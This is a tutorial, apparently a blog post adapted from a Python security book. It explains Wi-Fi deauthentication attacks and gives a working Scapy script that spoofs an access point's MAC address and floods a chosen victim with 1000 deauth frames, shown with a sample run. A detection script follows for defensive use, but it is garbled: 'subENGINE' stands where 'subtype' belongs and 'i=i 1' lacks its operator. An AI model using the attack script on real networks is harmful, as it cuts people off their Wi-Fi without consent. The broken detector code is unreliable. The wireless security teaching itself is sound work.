Deauthentication attacks or Deauth attacks fall under the category of management frame attacks or simply session management and authentication attacks. Most of us are not aware of Deauthentication attacks or Deauth attacks. So lets learn the basics of Deauthentication attacks or Deauth attacks. When a client wishes to disconnect from an Access Point, the client sends the deauthentication frame. Access Point also sends the deauthentication frame in the form of a reply. This is the normal process, but an attacker takes advantage of this process. The attacker spoofs the MAC address of the victim and sends the deauth frame to AP on behalf of the victim; because of this, the connection with the client is dropped. The aireplay-ng program is the best tool to accomplish the deauth attack. In this section, you will learn how to carry out this attack by using Python.
Now, let’s look at the following code:
from scapy.all import *
import sys
interface = “mon0”
BSSID = raw_input(“Enter the MAC of AP “)
victim_mac = raw_input(“Enter the MAC of Victim “)
frame= RadioTap()/ Dot11(addr1=victim_mac,addr2=BSSID, addr3=BSSID)/ Dot11Deauth()
sendp(frame,iface=interface, count= 1000, inter= .1)
This code is very easy to understand. The frame= RadioTap()/ Dot11(addr1=victim_mac,addr2=BSSID, addr3=BSSID)/ Dot11Deauth() statement creates the deauth packet. From the very first diagram in this chapter, you can check these addresses. In the last sendp (frame,iface=interface, count= 1000, inter= .1) line, count gives the total number of packets sent, and inter indicates the interval between the two packets.
The output of the deauth.py program is as follows:
root@Lokesh|Lucky:/wireless# python deauth.py
WARNING: No route found for IPv6 destination :: (no default route?)
Enter the MAC of AP 0c:d2:b5:01:0f:e6
Enter the MAC of Victim 88:53:2E:0A:75:3F
The aim of this attack is not only to perform a deauth attack but also to check the victim’s security system. IDS should have the capability to detect the deauth attack. So far, there is no way of avoiding attack, but it can be detected.
You can offer a solution to your client for this attack. A simple Python script can detect the deauth attack. The following is the code for the detection:
from scapy.all import *
interface = ‘mon0’
i=1
def info(fm):
if fm.haslayer(Dot11):
if ((fm.type == 0) & (fm.subENGINE==12)):
global i
print “Deauth detected “, i
i=i 1
sniff(iface=interface,prn=info)
The preceding code is very easy to understand. Let’s look at the new things here. The fm.subENGINE==12 statement indicates the deauth frame, and the globally declared i variable informs us of the packet counts.
In order to check the attack, I have carried out the deauth attack.
The output of the mac_d.py script is as follows:
root@Lokesh|Lucky:/wireless# python mac_d.py
WARNING: No route found for IPv6 destination :: (no default route?)
Deauth detected 1
Deauth detected 2
Deauth detected 3
Deauth detected 4
Deauth detected 5
Deauth detected 6
Deauth detected 7
Deauth detected 8
By analyzing the packet count, you can detect whether it falls under the DoS attack or normal behavior. I hope you learned something valuable from this article.
Leave a Reply